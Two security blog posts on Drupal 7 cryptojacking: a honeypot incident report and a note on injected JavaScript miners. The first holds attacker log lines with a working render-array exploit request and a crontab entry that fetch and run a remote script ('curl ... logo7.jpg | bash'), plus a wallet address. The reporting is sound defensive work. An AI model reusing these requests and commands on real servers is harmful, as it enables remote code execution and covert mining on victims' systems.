Suppoie Crypto Hijack

Suppoie Crypto Hijack

We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to pull down a jpeg image, which turned out to be a script. The script connects to a Monero mining pool, and starts mining crypto from the server automatically. Vulnerability used is via Curl in this version of Drupal.

Here’s all of the traffic from the attacker:

81.92.203.123 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby"

81.92.203.123 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby"

81.92.203.123 - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"

 

The file logo7.jpg pulled down from gmicameroon.com site is a script that runs the miner in /var/tmp/suppoie running as www-data on the device:

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Created /var/tmp/suppoie (d9531f405d7231ac1e518e5bc3d1da8c) and config.json. The config.json file has embedded credentials to login to the mining pool under user

'47M4CxQoC46hxKL1De83oZ6J2sYDPqyKN2F6sovD5mSHAKA4SrwYXmMBBJ75waQb3qZDAf6uA9HMtg9h9PSMst1k1EsUdwp':

 

A crontab is created to keep the script going:

[email protected] /var/tmp # crontab -u www-data -l
* * * * * curl -s http://gmicameroon.com/logo7.jpg | bash -s

 

If you’re interested in doing analysis, I’ve added the code to download all of the files, password to the zip is infected.

Here’s an analysis courtesy of the JoeSandBox tool we often use to analyze Malware on this site.

 

Crypto Mining Website Injection

Crypto Mining Website Injection

No Comments

We’ve seen a campaign that hacks Drupal, and other platforms injecting scripts that run crypto mining javascript on the front page. In one case, it created a block that linked it to all pages. The vector and point of entry are still undetermined but believed to be a bug in Drupal 7.

Mining code with javascript hosted on https://cdn.nablabee.com. Encoded to obfuscate the ‘loadMiner’ code, shown in the image below:

The hijacked mining computers are being recruited to mine for the group supportxmr.com. If you use the ‘address’ in ‘payment address’, you’ll find a list of websites running this code, actively contributing to the hackers project.

We recommend a Website Firewall and regular scanning for Malware. Sucuri’s service picked up this obfuscated code on a client website, alerting us to the infection.

*** Update: As part of this find, we notified 25 websites about the infection, and many have since removed it. One organization claimed that there was a complaint lodged against them with the BBB after I had sent a notification about a week prior. Businesses ranged from Public Libraries to a Portable Bathroom company.